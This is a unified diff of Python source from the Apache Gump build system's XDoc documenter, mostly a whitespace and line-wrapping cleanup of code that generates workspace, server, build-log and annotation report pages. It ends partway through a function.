pythonSection=definitionSection.createSection('Python Information') - pythonTable=pythonSection.createTable() + pythonSection = definitionSection.createSection('Python Information') + pythonTable = pythonSection.createTable() pythonTable.createEntry('Python', str(sys.version)) - pythonTable.createEntry('Operating System (Name)', str(os.name)) - tracked=inspectGarbageCollection() + pythonTable.createEntry('Operating System (Name)', str(os.name)) + tracked = inspectGarbageCollection() if tracked: - pythonTable.createEntry('Garbage Collector Tracked', tracked) - - javaSection=definitionSection.createSection('Java Information') - javaTable=javaSection.createTable() - javaTable.createEntry('Java Command', self.run.getEnvironment().javaCommand) - javaproperties=self.run.getEnvironment().getJavaProperties() + pythonTable.createEntry('Garbage Collector Tracked', tracked) + + javaSection = definitionSection.createSection('Java Information') + javaTable = javaSection.createTable() + javaTable.createEntry('Java Command', + self.run.getEnvironment().javaCommand) + javaproperties = self.run.getEnvironment().getJavaProperties() if javaproperties: - for name in ['java.vendor', 'java.version', 'os.name', 'os.arch', 'os.version']: + for name in ['java.vendor', 'java.version', 'os.name', 'os.arch', + 'os.version']: if name in javaproperties: - javaTable.createEntry(name, javaproperties[name]) - - self.documentAnnotations(document,self.run) - - + javaTable.createEntry(name, javaproperties[name]) + + self.documentAnnotations(document, self.run) + + # # RunOptions - # - options=self.run.getOptions() - - optSection=document.createSection('Gump Run Options') + # + options = self.run.getOptions() + + optSection = document.createSection('Gump Run Options') optSection.createParagraph( - """The options selected for this Gump run.""") - - #self.documentAnnotations(document,options) - - optTable=optSection.createTable(['Name','Value']) - opts=0 - - descs={ 'Build':'Perform Build', - 'XDocs':'Generate XDOCS', - 'Statistics':'Update Statistics (to database)', - 'Verbose':'Verbose Run', - 'Cache':'Cache metadata (don\'t go to remote source)', - 'Text':'Text Output', - 'Official':'Official Run (e.g. nag notifies, etc.)', - 'Results':'Generate Results' } - + """The options selected for this Gump run.""") + + #self.documentAnnotations(document, options) + + optTable = optSection.createTable(['Name', 'Value']) + opts = 0 + + descs = { 'Build':'Perform Build', + 'XDocs':'Generate XDOCS', + 'Statistics':'Update Statistics (to database)', + 'Verbose':'Verbose Run', + 'Cache':'Cache metadata (don\'t go to remote source)', + 'Text':'Text Output', + 'Official':'Official Run (e.g. nag notifies, etc.)', + 'Results':'Generate Results' } + # iterate over this suites properties - for (name,value) in getBeanAttributes(options).items(): - desc=name + for (name, value) in getBeanAttributes(options).items(): + desc = name if descs.has_key(name): - desc = descs[name] + ' (' + name + ')' - optTable.createEntry(desc,value) - opts+=1 - - if not opts: optTable.createEntry('None') - + desc = descs[name] + ' (' + name + ')' + optTable.createEntry(desc, value) + opts += 1 + + if not opts: + optTable.createEntry('None') + # # Environment # - environment=self.run.getEnvironment() - - envSection=document.createSection('Gump Environment') + environment = self.run.getEnvironment() + + envSection = document.createSection('Gump Environment') envSection.createParagraph( - """The environment that this Gump run was within.""") - - propertiesSection=envSection.createSection('Properties') - envTable=propertiesSection.createTable(['Name/Description','Value']) - envs=0 + """The environment that this Gump run was within.""") + + propertiesSection = envSection.createSection('Properties') + envTable = propertiesSection.createTable(['Name/Description', 'Value']) + envs = 0 # iterate over this suites properties - for (name,value) in getBeanAttributes(environment).items(): - envTable.createEntry(name,str(value)) - envs+=1 - if not envs: envTable.createEntry('None') - - - self.documentAnnotations(document,environment) - #self.documentFileList(document,environment,'Environment-level Files') - self.documentWorkList(document,environment,'Environment-level Work') - - document.serialize() - document=None - - def documentXMLLinks(self, document=None, table=None, rdf=True, depth=0): + for (name, value) in getBeanAttributes(environment).items(): + envTable.createEntry(name, str(value)) + envs += 1 + if not envs: + envTable.createEntry('None') + + self.documentAnnotations(document, environment) + #self.documentFileList(document, environment, 'Environment-level Files') + self.documentWorkList(document, environment, 'Environment-level Work') + + document.serialize() + document = None + + def documentXMLLinks(self, document = None, table = None, rdf = True, + depth = 0): """ - + Show RSS|Atom|RDF. - + """ if not table: - table=document.createTable(['XML Description','Links']) - - rssSyndRow=table.createRow() + table = document.createTable(['XML Description', 'Links']) + + rssSyndRow = table.createRow() rssSyndRow.createData().createStrong('RSS Syndication') - rssArea=rssSyndRow.createData() - rssArea.createFork('rss.xml','RSS') - rssUrl=self.resolver.getUrl(self.workspace,'rss','.xml') - rssArea.createFork('http://www.feedvalidator.org/check.cgi?url=' + rssUrl) \ - .createIcon(self.resolver.getImageUrl('valid-rss.png',depth), alt='[Valid RSS]') #, title='Validate my RSS feed', width='88', height='31') - - atomSyndRow=table.createRow() + rssArea = rssSyndRow.createData() + rssArea.createFork('rss.xml', 'RSS') + rssUrl = self.resolver.getUrl(self.workspace, 'rss', '.xml') + rssArea.createFork('http://www.feedvalidator.org/check.cgi?url=' + \ + rssUrl) \ + .createIcon(self.resolver\ + .getImageUrl('valid-rss.png', + depth), + alt = '[Valid RSS]') + #, title = 'Validate my RSS feed', width = '88', height = '31') + + atomSyndRow = table.createRow() atomSyndRow.createData().createStrong('Atom Syndication') - atomArea=atomSyndRow.createData() - atomArea.createFork('atom.xml','Atom') - atomUrl=self.resolver.getUrl(self.workspace,'atom','.xml') - atomArea.createFork('http://www.feedvalidator.org/check.cgi?url=' + atomUrl) \ - .createIcon(self.resolver.getImageUrl('valid-atom.png',depth), alt='[Valid Atom]') #, title='Validate my Atom feed', width='88', height='31') - + atomArea = atomSyndRow.createData() + atomArea.createFork('atom.xml', 'Atom') + atomUrl = self.resolver.getUrl(self.workspace, 'atom', '.xml') + atomArea.createFork('http://www.feedvalidator.org/check.cgi?url=' + \ + atomUrl) \ + .createIcon(self.resolver\ + .getImageUrl('valid-atom.png', + depth), + alt = '[Valid Atom]') + #, title = 'Validate my Atom feed', width = '88', height = '31') + if rdf: - rdfRow=table.createRow() + rdfRow = table.createRow() rdfRow.createData().createStrong('RDF Metadata') - rdfArea=rdfRow.createData() - rdfArea.createFork('gump.actor.rdf','RDF') - - def documentPartial(self,node): - notice=node.createWarning() - - notice.createText("""This output does not represent the complete workspace, - but part of it. + rdfArea = rdfRow.createData() + rdfArea.createFork('gump.actor.rdf', 'RDF') + + def documentPartial(self, node): + notice = node.createWarning() + + notice.createText( + """This output does not represent the complete workspace, + but part of it. Only projects, and their dependents, matching this regular expression """) - notice.createStrong(self.gumpSet.projectexpression) - notice.createBreak() - notice.createBreak() - notice.createStrong('Requested Projects: ') - notice.createBreak() - notice.createBreak() - for project in self.gumpSet.projects: - notice.createText(project.name) - notice.createText(' ') - + notice.createStrong(self.gumpSet.projectexpression) + notice.createBreak() + notice.createBreak() + notice.createStrong('Requested Projects: ') + notice.createBreak() + notice.createBreak() + for project in self.gumpSet.projects: + notice.createText(project.name) + notice.createText(' ') + def documentEverythingElse(self): - + self.documentRepositories() self.documentServers() self.documentTrackers() - + self.documentBuildLog() self.documentNotesLog() self.documentDiffsLog() - + self.documentProjects() self.documentModules() - + self.documentPackages() - + # # Document individual repositories # - for repo in self.workspace.getRepositories(): - if not self.gumpSet.inRepositories(repo): continue + for repo in self.workspace.getRepositories(): + if not self.gumpSet.inRepositories(repo): + continue self.documentRepository(repo) - + # # Document individual servers # - for server in self.workspace.getServers(): + for server in self.workspace.getServers(): self.documentServer(server) - + # Document individual trackers - for tracker in self.workspace.getTrackers(): + for tracker in self.workspace.getTrackers(): self.documentTracker(tracker) - + # Document individual modules - for module in self.gumpSet.getCompletedModules(): + for module in self.gumpSet.getCompletedModules(): self.documentModule(module) - + # Document workspace 'Text' - spec=self.resolver.getFileSpec(self.workspace, 'context') - document=XDocDocument('Context', - spec.getFile() , - self.config, - spec.getRootPath()) - stream=StringIO.StringIO() - texter=TextDocumenter(self.run,stream) + spec = self.resolver.getFileSpec(self.workspace, 'context') + document = XDocDocument('Context', + spec.getFile(), + self.config, + spec.getRootPath()) + stream = StringIO.StringIO() + texter = TextDocumenter(self.run, stream) texter.document() stream.seek(0) document.createSource(stream.read()) stream.close() document.serialize() - + if not self.workspace.private: - # Document the workspace XML - spec=self.resolver.getFileSpec(self.workspace, 'workspace_defn') - document=XDocDocument('Definition', - spec.getFile() , - self.config, - spec.getRootPath()) - stream=StringIO.StringIO() + # Document the workspace XML + spec = self.resolver.getFileSpec(self.workspace, 'workspace_defn') + document = XDocDocument('Definition', + spec.getFile(), + self.config, + spec.getRootPath()) + stream = StringIO.StringIO() try: - self.workspace.dom.writexml(stream,indent=' ',newl='\n') + self.workspace.dom.writexml(stream, indent = ' ', newl = '\n') except Exception, details: - stream.write('Failed to XML serialize the data. ' + str(details)) + stream.write('Failed to XML serialize the data. ' \ + + str(details)) stream.seek(0) document.createSource(stream.read()) stream.close() - document.serialize() - - ##################################################################### + document.serialize() + + ##################################################################### + # + # Workspace # - # Workspace - # def documentWorkspace(self): - - + + # # ---------------------------------------------------------------------- # # Index.xml # - - spec=self.resolver.getFileSpec(self.workspace,) - document=XDocDocument('Workspace', - spec.getFile() , - self.config, - spec.getRootPath()) - - definitionSection=document.createSection('Workspace Definition') - - definitionTable=definitionSection.createTable() - definitionTable.createEntry('Workspace Name', - self.workspace.getName()) + + spec = self.resolver.getFileSpec(self.workspace) + document = XDocDocument('Workspace', + spec.getFile(), + self.config, + spec.getRootPath()) + + definitionSection = document.createSection('Workspace Definition') + + definitionTable = definitionSection.createTable() + definitionTable.createEntry('Workspace Name', + self.workspace.getName()) if self.workspace.hasDomChild('description'): - definitionTable.createEntry('Description', - self.workspace.getDomChildValue('description')) - if self.workspace.hasDomChild('version'): - definitionTable.createEntry('Workspace Version', + definitionTable.createEntry('Description', + self.workspace\ + .getDomChildValue('description')) + if self.workspace.hasDomChild('version'): + definitionTable.createEntry('Workspace Version', self.workspace.getDomAttributeValue('version')) if not self.workspace.hasDomAttribute('version') \ or not self.workspace.getDomAttributeValue('version') \ - == setting.WS_VERSION: - definitionTable.createEntry('Gump Preferred Workspace Version', + == setting.WS_VERSION: + definitionTable.createEntry('Gump Preferred Workspace Version', setting.WS_VERSION) definitionTable.createEntry('@@DATE@@', default.date_s) - definitionTable.createEntry('Start Date/Time (UTC)', self.run.getStart().getUtc()) - definitionTable.createEntry('Start Date/Time', self.run.getStart().getLocal()) - definitionTable.createEntry('Timezone', self.run.getEnvironment().getTimezone()) - - - rssSyndRow=definitionTable.createRow() + definitionTable.createEntry('Start Date/Time (UTC)', + self.run.getStart().getUtc()) + definitionTable.createEntry('Start Date/Time', + self.run.getStart().getLocal()) + definitionTable.createEntry('Timezone', + self.run.getEnvironment().getTimezone()) + + + rssSyndRow = definitionTable.createRow() rssSyndRow.createData('Syndication') - rssSyndRow.createData().createFork('rss.xml','RSS') - atomSyndRow=definitionTable.createRow() + rssSyndRow.createData().createFork('rss.xml', 'RSS') + atomSyndRow = definitionTable.createRow() atomSyndRow.createData('Syndication') - atomSyndRow.createData().createFork('atom.xml','Atom') - - textRow=definitionTable.createRow() + atomSyndRow.createData().createFork('atom.xml', 'Atom') + + textRow = definitionTable.createRow() textRow.createData('Workspace Documentation') - textRow.createData().createLink('context.html','Text') - - if not self.workspace.private: - syndRow=definitionTable.createRow() + textRow.createData().createLink('context.html', 'Text') + + if not self.workspace.private: + syndRow = definitionTable.createRow() syndRow.createData('Definition') - syndRow.createData().createLink('workspace_defn.html','XML') - - self.documentAnnotations(document,self.workspace) - #self.documentXML(document,self.workspace) - - detailsSection=document.createSection('Details') - - detailsTable=detailsSection.createTable() - detailsTable.createEntry("State : ", - self.workspace.getStateDescription()) + syndRow.createData().createLink('workspace_defn.html', 'XML') + + self.documentAnnotations(document, self.workspace) + #self.documentXML(document, self.workspace) + + detailsSection = document.createSection('Details') + + detailsTable = detailsSection.createTable() + detailsTable.createEntry("State : ", + self.workspace.getStateDescription()) e = self.workspace.getElapsedTimeString() - if e : detailsTable.createEntry("Elapsed Time : ", e) - detailsTable.createEntry("Base Directory : ", self.workspace.getBaseDirectory()) - detailsTable.createEntry("Temporary Directory : ", self.workspace.tmpdir) + if e: + detailsTable.createEntry("Elapsed Time : ", e) + detailsTable.createEntry("Base Directory : ", + self.workspace.getBaseDirectory()) + detailsTable.createEntry("Temporary Directory : ", + self.workspace.tmpdir) #if self.workspace.scratchdir: - # detailsTable.createEntry("Scratch Directory : ", self.workspace.scratchdir)) + # detailsTable.createEntry("Scratch Directory : ", + # self.workspace.scratchdir)) # :TODO: We have duplicate dirs? tmp = scratch? - detailsTable.createEntry("Log Directory : ", self.workspace.logdir) - detailsTable.createEntry("Outputs Repository : ", self.workspace.repodir) + detailsTable.createEntry("Log Directory : ", + self.workspace.logdir) + detailsTable.createEntry("Outputs Repository : ", + self.workspace.repodir) detailsTable.createEntry("CVS Directory : ", self.workspace.cvsdir) detailsTable.createEntry("Package Directory : ", self.workspace.pkgdir) if not self.workspace.private: - detailsTable.createEntry("E-mail Server: ", self.workspace.mailserver) + detailsTable.createEntry("E-mail Server: ", + self.workspace.mailserver) detailsTable.createEntry("E-mail Port: ", self.workspace.mailport) - detailsTable.createEntry("List Address: ", self.workspace.administrator) - detailsTable.createEntry("E-mail Address: ", self.workspace.email) + detailsTable.createEntry("List Address: ", + self.workspace.administrator) + detailsTable.createEntry("E-mail Address: ", self.workspace.email) detailsTable.createEntry("Prefix: ", self.workspace.prefix) detailsTable.createEntry("Signature: ", self.workspace.signature) - - self.documentStats(document,self.workspace) - self.documentProperties(detailsSection, self.workspace, 'Workspace Properties') - + + self.documentStats(document, self.workspace) + self.documentProperties(detailsSection, self.workspace, + 'Workspace Properties') + # Does this self.workspace send notification (nag) mails? - detailsTable.createEntry("Send Notification E-mails: ", `self.workspace.isNotify()`) - - detailsTable.createEntry("Multi-threading: ", `self.workspace.isMultithreading()`) + detailsTable.createEntry("Send Notification E-mails: ", + `self.workspace.isNotify()`) + + detailsTable.createEntry("Multi-threading: ", + `self.workspace.isMultithreading()`) if self.workspace.isMultithreading(): - detailsTable.createEntry("Updater Threads: ", `self.workspace.getUpdaters()`) - detailsTable.createEntry("Builder Threads: ", `self.workspace.getBuilders()`) - - #document.createRaw('<p><strong>Context Tree:</strong> <link href=\'workspace.html\'>workspace</link></p>') - # x.write('<p><strong>Workspace Config:</strong> <link href=\'xml.txt\'>XML</link></p>') - # x.write('<p><strong>RSS :</strong> <link href=\'index.rss\'>News Feed</link></p>') - - self.documentFileList(document,self.workspace,'Workspace-level Files') - self.documentWorkList(document,self.workspace,'Workspace-level Work') - - document.serialize() - document=None - - - def documentRepositories(self): - + detailsTable.createEntry("Updater Threads: ", + `self.workspace.getUpdaters()`) + detailsTable.createEntry("Builder Threads: ", + `self.workspace.getBuilders()`) + + #document.createRaw('<p><strong>Context Tree:</strong> ' + \ + # '<link href=\'workspace.html\'>workspace' + \ + # '</link></p>') + #x.write('<p><strong>Workspace Config:</strong> ' + \ + # '<link href=\'xml.txt\'>XML</link></p>') + #x.write('<p><strong>RSS :</strong> <link href=\'index.rss\'>' + \ + # 'News Feed</link></p>') + + self.documentFileList(document, self.workspace, 'Workspace-level Files') + self.documentWorkList(document, self.workspace, 'Workspace-level Work') + + document.serialize() + document = None + + + def documentRepositories(self): + # # ---------------------------------------------------------------------- # # Repositories.xml # - spec=self.resolver.getFileSpec(self.workspace, 'repositories') - document=XDocDocument( 'All Repositories', - spec.getFile() , - self.config, - spec.getRootPath()) - - - reposSection=document.createSection('All Repositories') - reposTable=reposSection.createTable(['Name']) - + spec = self.resolver.getFileSpec(self.workspace, 'repositories') + document = XDocDocument('All Repositories', + spec.getFile(), + self.config, + spec.getRootPath()) + + + reposSection = document.createSection('All Repositories') + reposTable = reposSection.createTable(['Name']) + # Pretty sorting... - sortedRepositoryList=createOrderedList(self.gumpSet.getRepositories()) - - rcount=0 + sortedRepositoryList = createOrderedList(self.gumpSet.getRepositories()) + + rcount = 0 for repo in sortedRepositoryList: - if not self.gumpSet.inRepositories(repo): continue - - rcount+=1 - - repoRow=reposTable.createRow() + if not self.gumpSet.inRepositories(repo): + continue + + rcount += 1 + + repoRow = reposTable.createRow() repoRow.createComment(repo.getName()) - - self.insertLink( repo, self.workspace, repoRow.createData()) - - if not rcount: reposTable.createLine('None') - - document.serialize() - document=None - - def documentServers(self): - + + self.insertLink(repo, self.workspace, repoRow.createData()) + + if not rcount: + reposTable.createLine('None') + + document.serialize() + document = None + + def documentServers(self): + # # ---------------------------------------------------------------------- # # Servers.xml # - spec=self.resolver.getFileSpec(self.workspace, 'servers') - document=XDocDocument( 'All Servers', - spec.getFile() , - self.config, - spec.getRootPath()) - - serversSection=document.createSection('All Servers') - serversTable=serversSection.createTable(['Name','Status','Notes','Results','Start (Local)','Start (UTC)','End (UTC)','Offset (from UTC)']) - - sortedServerList=createOrderedList(self.workspace.getServers()) - - scount=0 + spec = self.resolver.getFileSpec(self.workspace, 'servers') + document = XDocDocument('All Servers', + spec.getFile(), + self.config, + spec.getRootPath()) + + serversSection = document.createSection('All Servers') + serversTable = serversSection.createTable(['Name', 'Status', 'Notes', + 'Results', 'Start (Local)', + 'Start (UTC)', 'End (UTC)', + 'Offset (from UTC)']) + + sortedServerList = createOrderedList(self.workspace.getServers()) + + scount = 0 for server in sortedServerList: - - scount+=1 - - serverRow=serversTable.createRow() + + scount += 1 + + serverRow = serversTable.createRow() serverRow.createComment(server.getName()) - - self.insertLink( server, self.workspace, serverRow.createData()) - - if server.isUp(): + + self.insertLink(server, self.workspace, serverRow.createData()) + + if server.isUp(): serverRow.createData('Up') else: - serverRow.createData().createStrong('Down') - + serverRow.createData().createStrong('Down') + if server.hasNote(): serverRow.createData(server.getNote()) else: serverRow.createData('') - + if server.hasResultsUrl(): - serverRow.createData().createFork( \ - server.getResultsUrl(), \ - 'Results') + serverRow.createData().createFork(server.getResultsUrl(), + 'Results') else: serverRow.createData('Not Available') - + if server.hasResults(): serverRow.createData(server.getResults().getStart().getLocal()) serverRow.createData(server.getResults().getEnd().getLocal()) @@ -688,1716 +733,1913 @@ serverRow.createData('N/A') serverRow.createData('N/A') serverRow.createData('N/A') - - - if not scount: serversTable.createLine('None') - + + + if not scount: + serversTable.createLine('None') + document.serialize() - - def documentTrackers(self): + + def documentTrackers(self): # # ---------------------------------------------------------------------- # # Trackers.xml # - spec=self.resolver.getFileSpec(self.workspace, 'trackers') - document=XDocDocument( 'All Trackers', - spec.getFile() , - self.config, - spec.getRootPath()) - - trackersSection=document.createSection('All Trackers') - trackersTable=trackersSection.createTable(['Name']) - - sortedTrackerList=createOrderedList(self.workspace.getTrackers()) - - scount=0 + spec = self.resolver.getFileSpec(self.workspace, 'trackers') + document = XDocDocument('All Trackers', + spec.getFile(), + self.config, + spec.getRootPath()) + + trackersSection = document.createSection('All Trackers') + trackersTable = trackersSection.createTable(['Name']) + + sortedTrackerList = createOrderedList(self.workspace.getTrackers()) + + scount = 0 for tracker in sortedTrackerList: - - scount+=1 - - trackerRow=trackersTable.createRow() + + scount += 1 + + trackerRow = trackersTable.createRow() trackerRow.createComment(tracker.getName()) - - self.insertLink( tracker, self.workspace, trackerRow.createData()) - - if not scount: trackersTable.createLine('None') - + + self.insertLink(tracker, self.workspace, trackerRow.createData()) + + if not scount: + trackersTable.createLine('None') + document.serialize() - - def documentBuildLog(self,realTime=False): + + def documentBuildLog(self, realTime = False): # # buildLog.xml -- Modules/Projects in build order # - spec=self.resolver.getFileSpec(self.workspace, 'buildLog') - document=XDocDocument('Gump Build Log', - spec.getFile() , - self.config, - spec.getRootPath()) - - if realTime: - + spec = self.resolver.getFileSpec(self.workspace, 'buildLog') + document = XDocDocument('Gump Build Log', + spec.getFile(), + self.config, + spec.getRootPath()) + + if realTime: + # Work done... modules = len(self.gumpSet.getCompletedModules()) projects = len(self.gumpSet.getCompletedProjects()) - - document.createWarning("""This Gump run is currently in progress. + + document.createWarning( + """This Gump run is currently in progress. It started at %s. As of this moment (%s), %s modules have been updated, and %s projects built.""" \ - % (self.run.getStart().getLocal(), time.strftime('%H:%M:%S'), modules, projects )) - - #document.createNote("""Only projects with significant information - #(e.g a recent change of state, a failure, etc.) are [email protected].""") - + % (self.run.getStart().getLocal(), + time.strftime('%H:%M:%S'), modules, projects )) + +# document.createNote( +# """Only projects with significant information +# (e.g a recent change of state, a failure, etc.) are [email protected].""") + else: - document.createNote("""This Gump run is complete. - It started at %s and ended at %s.""" - % ( self.run.getStart().getLocal(), + document.createNote("""This Gump run is complete. + It started at %s and ended at %s.""" + % (self.run.getStart().getLocal(), self.run.getEnd().getLocal())) - + if not self.gumpSet.isFull(): - self.documentPartial(document) - - if not realTime: - self.documentSummary(document, self.workspace.getProjectSummary()) - - if not realTime: + self.documentPartial(document) + + if not realTime: + self.documentSummary(document, self.workspace.getProjectSummary()) + + if not realTime: # # Modules... - # - modulesSection=document.createSection('Modules (in update order)') - modulesTable=modulesSection.createTable(['Index','Updated','Name','State','Duration\nin state','Last Modified','Notes']) - mcount=0 - for module in self.gumpSet.getCompletedModules(): - - mcount+=1 - - moduleRow=modulesTable.createRow() - moduleRow.createComment(module.getName()) - - self.setStyleFromState(moduleRow,module.getStatePair()) - - moduleRow.createData(module.getPositionIndex()) - + # + modulesSection = document.createSection('Modules (in update order)') + modulesTable = modulesSection.createTable(['Index', 'Updated', + 'Name', 'State', + 'Duration\nin state', + 'Last Modified', + 'Notes']) + mcount = 0 + for module in self.gumpSet.getCompletedModules(): + + mcount += 1 + + moduleRow = modulesTable.createRow() + moduleRow.createComment(module.getName()) + + self.setStyleFromState(moduleRow, module.getStatePair()) + + moduleRow.createData(module.getPositionIndex()) + if module.hasStart(): - startData=moduleRow.createData(module.getStart().getLocal()) - else: - startData=moduleRow.createData('-') - - self.setStyleFromState(startData,module.getStatePair()) - - self.insertLink(module,self.workspace,moduleRow.createData()) - self.insertStateIcon(module,self.workspace,moduleRow.createData()) - moduleRow.createData(module.getStats().sequenceInState) - moduleRow.createData( \ - getGeneralSinceDescription( \ + startData = moduleRow.createData(module.getStart()\ + .getLocal()) + else: + startData = moduleRow.createData('-') + + self.setStyleFromState(startData, module.getStatePair()) + + self.insertLink(module, self.workspace, moduleRow.createData()) + self.insertStateIcon(module, self.workspace, + moduleRow.createData()) + moduleRow.createData(module.getStats().sequenceInState) + moduleRow.createData( + getGeneralSinceDescription( module.getStats().getLastModified())) - - notes='' + + notes = '' if module.isVerbose(): - if notes: notes += ' ' + if notes: + notes += ' ' notes += 'Verbose' if module.isDebug(): - if notes: notes += ' ' - notes += 'Debug' - moduleRow.createData(notes) - - if not mcount: modulesTable.createLine('None') - + if notes: + notes += ' ' + notes += 'Debug' + moduleRow.createData(notes) + + if not mcount: + modulesTable.createLine('None') + # # Projects... # - projectsSection=document.createSection('Projects (in build order)') - projectsTable=projectsSection.createTable(['Index','Time','Name','State','Duration\nin state','Last Modified','Notes']) - pcount=0 + projectsSection = document.createSection('Projects (in build order)') + projectsTable = projectsSection.createTable(['Index', 'Time', 'Name', + 'State', + 'Duration\nin state', + 'Last Modified', 'Notes']) + pcount = 0 for project in self.gumpSet.getCompletedProjects(): - + # Hack for bad data. - if not project.inModule(): continue - + if not project.inModule(): + continue + #if realTime and \ - # (project.getState()==STATE_FAILED or \ - # ((project.getState()<>STATE_PREREQ_FAILED) and \ - # (project.getStats().sequenceInState < INSIGNIFICANT_DURATION))): + # (project.getState()==STATE_FAILED or \ + # ((project.getState()<>STATE_PREREQ_FAILED) and \ + # (project.getStats().sequenceInState \ + # < INSIGNIFICANT_DURATION))): # continue - - pcount+=1 - - projectRow=projectsTable.createRow() - projectRow.createComment(project.getName()) - - self.setStyleFromState(projectRow,project.getStatePair()) - - projectRow.createData(project.getPositionIndex()) - + + pcount += 1 + + projectRow = projectsTable.createRow() + projectRow.createComment(project.getName()) + + self.setStyleFromState(projectRow, project.getStatePair()) + + projectRow.createData(project.getPositionIndex()) + if project.hasStart(): - projectRow.createData(project.getStart().getLocal()) + projectRow.createData(project.getStart().getLocal()) else: - projectRow.createData('-') - - self.insertLink(project,self.workspace,projectRow.createData()) - self.insertStateIcon(project,self.workspace,projectRow.createData()) - projectRow.createData(project.getStats().sequenceInState) - projectRow.createData( \ - getGeneralSinceDescription( \ + projectRow.createData('-') + + self.insertLink(project, self.workspace, projectRow.createData()) + self.insertStateIcon(project, self.workspace, + projectRow.createData()) + projectRow.createData(project.getStats().sequenceInState) + projectRow.createData(getGeneralSinceDescription( project.getModule().getStats().getLastModified())) - - notes='' + + notes = '' if project.isVerbose(): - if notes: notes += ' ' + if notes: + notes += ' ' notes += 'Verbose' if project.isDebug(): - if notes: notes += ' ' - notes += 'Debug' - projectRow.createData(notes) - - if not pcount: projectsTable.createLine('None') - - document.serialize() - document=None - - def documentNotesLog(self): + if notes: + notes += ' ' + notes += 'Debug' + projectRow.createData(notes) + + if not pcount: + projectsTable.createLine('None') + + document.serialize() + document = None + + def documentNotesLog(self): # # ---------------------------------------------------------------------- # # notesLog.xml -- Notes log # - spec=self.resolver.getFileSpec(self.workspace, 'notesLog') - document=XDocDocument('Annotations', - spec.getFile() , - self.config, - spec.getRootPath()) - - notesSection=document.createSection('Negative Annotations') + spec = self.resolver.getFileSpec(self.workspace, 'notesLog') + document = XDocDocument('Annotations', + spec.getFile(), + self.config, + spec.getRootPath()) + + notesSection = document.createSection('Negative Annotations') notesSection.createParagraph( """This page displays entities with errors and/or warning annotations.""") - - ncount=0 - for module in self.gumpSet.getCompletedModules(): - - moduleSection=None - - if module.containsNasties(): - moduleSection=document.createSection('Module : ' + module.getName()) + + ncount = 0 + for module in self.gumpSet.getCompletedModules(): + + moduleSection = None + + if module.containsNasties(): + moduleSection = document.createSection('Module : ' \ + + module.getName()) # Link to the module - self.insertLink(module,self.workspace,moduleSection.createParagraph()) - + self.insertLink(module, self.workspace, + moduleSection.createParagraph()) + # Display the module annotations - self.documentAnnotations(moduleSection,module,1) - + self.documentAnnotations(moduleSection, module, 1) + for project in module.getProjects(): - if not self.gumpSet.inProjectSequence(project): continue - if not project.containsNasties(): continue - - if not moduleSection: - moduleSection=document.createSection('Module : ' + module.getName()) + if not self.gumpSet.inProjectSequence(project): + continue + if not project.containsNasties(): + continue + + if not moduleSection: + moduleSection = document.createSection('Module : ' + \ + module.getName()) + + projectSection = moduleSection.createSection('Project : ' + \ + project\ + .getName()) - projectSection=moduleSection.createSection('Project : ' + project.getName()) - # Link to the project - self.insertLink(project,self.workspace,projectSection.createParagraph()) - + self.insertLink(project, self.workspace, + projectSection.createParagraph()) + # Display the annotations - self.documentAnnotations(projectSection,project,1) - - ncount+=1 - - if not ncount: notesSection.createParagraph('None.') - - document.serialize() - - def documentDiffsLog(self): - + self.documentAnnotations(projectSection, project, 1) + + ncount += 1 + + if not ncount: + notesSection.createParagraph('None.') + + document.serialize() + + def documentDiffsLog(self): + # # ---------------------------------------------------------------------- # # diffsLog.xml -- Server Differences log # - spec=self.resolver.getFileSpec(self.workspace, 'diffsLog') - document=XDocDocument('Server Differences', - spec.getFile() , - self.config, - spec.getRootPath()) - - diffsSection=document.createSection('Server Differences') - diffsSection.createParagraph( + spec = self.resolver.getFileSpec(self.workspace, 'diffsLog') + document = XDocDocument('Server Differences', + spec.getFile(), + self.config, + spec.getRootPath()) + + diffsSection = document.createSection('Server Differences') + diffsSection.createParagraph(\ """This page displays entities with different states on different servers.""") - - dcount=0 - for module in self.gumpSet.getCompletedModules(): - - moduleSection=None + + dcount = 0 + for module in self.gumpSet.getCompletedModules(): + + moduleSection = None if module.hasServerResults() \ - and module.getServerResults().hasDifferences() \ + and module.getServerResults().hasDifferences() \ and module.getServerResults().containsFailure() : - moduleSection=document.createSection('Module : ' + module.getName()) + moduleSection = document.createSection('Module : ' + \ + module.getName()) # Link to the module - self.insertLink(module,self.workspace,moduleSection.createParagraph()) - + self.insertLink(module, self.workspace, + moduleSection.createParagraph()) + # Display the module server links - self.documentServerLinks(moduleSection,module,getDepthForObject(self.workspace)) - + self.documentServerLinks(moduleSection, module, + getDepthForObject(self.workspace)) + for project in module.getProjects(): - if not self.gumpSet.inProjectSequence(project): continue - if not project.hasServerResults(): continue - if not project.getServerResults().hasDifferences(): continue - if not project.getServerResults().containsFailure(): continue - - if not moduleSection: - moduleSection=document.createSection('Module : ' + module.getName()) + if not self.gumpSet.inProjectSequence(project) \ + or not project.hasServerResults() \ + or not project.getServerResults().hasDifferences() \ + or not project.getServerResults().containsFailure(): + continue + + if not moduleSection: + moduleSection = document.createSection('Module : ' + \ + module.getName()) + + projectSection = moduleSection.createSection('Project : ' + \ + project\ + .getName()) - projectSection=moduleSection.createSection('Project : ' + project.getName()) - # Link to the project - self.insertLink(project,self.workspace,projectSection.createParagraph()) - + self.insertLink(project, self.workspace, + projectSection.createParagraph()) + # Display the project server links - self.documentServerLinks(projectSection,project,getDepthForObject(self.workspace)) - - dcount+=1 - - if not dcount: diffsSection.createParagraph('None.') - - document.serialize() - - def documentProjects(self): - - sortedProjectList=createOrderedList(self.gumpSet.getProjectSequence()) - + self.documentServerLinks(projectSection, project, + getDepthForObject(self.workspace)) + + dcount += 1 + + if not dcount: + diffsSection.createParagraph('None.') + + document.serialize() + + def documentProjects(self): + + sortedProjectList = createOrderedList(self.gumpSet.getProjectSequence()) + # # ---------------------------------------------------------------------- # # project_todos.xml -- Projects w/ issues in build order # - spec=self.resolver.getFileSpec(self.workspace, 'project_todos') - document=XDocDocument('Projects with issues', - spec.getFile() , - self.config, - spec.getRootPath()) + spec = self.resolver.getFileSpec(self.workspace, 'project_todos') + document = XDocDocument('Projects with issues', + spec.getFile(), + self.config, + spec.getRootPath()) self.documentSummary(document, self.workspace.getProjectSummary()) - - totalAffected=0 - - projectsSection=document.createSection('Projects with issues...') - projectsSection.createParagraph("""These are the project that need 'fixing'. -This page helps Gumpmeisters (and others) locate the main areas to focus attention.""") - projectsTable=projectsSection.createTable(['Name', - 'Dependees','Affected', - 'Project State','Duration\nin state']) - pcount=0 - - 